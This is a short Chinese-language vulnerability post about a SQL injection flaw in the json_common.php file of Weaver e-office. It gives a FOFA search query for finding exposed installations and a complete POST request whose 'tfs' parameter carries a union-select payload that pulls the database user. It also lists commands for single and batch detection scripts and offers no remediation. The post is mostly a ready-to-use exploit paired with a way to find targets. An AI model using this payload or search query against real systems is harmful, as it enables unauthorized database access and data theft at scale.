泛微e-office json_common.php SQL注入漏洞

一、漏洞描述

泛微e-office为企业办公提供丰富应用,覆盖常见协作场景,开箱即用。满足人事、行政、财务、销售、运营、市场等不同部门协作需求,帮助组织高效管事理人。

系统 json_common.php 文件存在SQL注入漏洞

二、网络空间搜索引擎搜索

fofa查询

复制代码
app="泛微-EOffice"

三、漏洞复现

poc

复制代码
POST /building/json_common.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: LOGIN_LANG=cn; PHPSESSID=bd702adc830fba4fbcf5f336471aeb2e
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,user() ,4#|2|333

四、漏洞检测

单个检测

复制代码
python json_commonSQLcheck.py -u url[例 http://127.0.0.1:8080]

批量检测

复制代码
python json_commonSQLcheck.py -f filename

关注公众号 网络安全透视镜 回复 20231018 获取批量检测脚本

相关推荐
星辰离彬14 分钟前
Java 与 MySQL 性能优化:MySQL 慢 SQL 诊断与分析方法详解
java·spring boot·后端·sql·mysql·性能优化
wo3258661452 小时前
浪潮交换机配置track检测实现高速公路收费网络主备切换NQA
开发语言·网络·php
luopeng2076634363 小时前
虚拟局域网中配置某台服务器作为网关的方案
运维·服务器·php
浮生若梦l8 小时前
在 Spring Boot 项目里,MYSQL中json类型字段使用
spring boot·mysql·json
CRMEB定制开发8 小时前
CRMEB 中 PHP 短信扩展开发:涵盖一号通、阿里云、腾讯云、创蓝
阿里云·php·腾讯云·商城系统·微信商城
远方16098 小时前
21-Oracle 23 ai-Automatic SQL Plan Management(SPM)
数据库·sql·oracle
cookqq9 小时前
mongodb源码分析session执行handleRequest命令find过程
数据库·sql·mongodb·nosql
岁忧10 小时前
LeetCode 高频 SQL 50 题(基础版)之 【高级字符串函数 / 正则表达式 / 子句】· 下
sql·leetcode·正则表达式
写bug写bug10 小时前
SQL窗口函数原理和使用
后端·sql·mysql
浠寒AI12 小时前
PostgreSQL 与 SQL 基础:为 Fast API 打下数据基础
数据库·sql·postgresql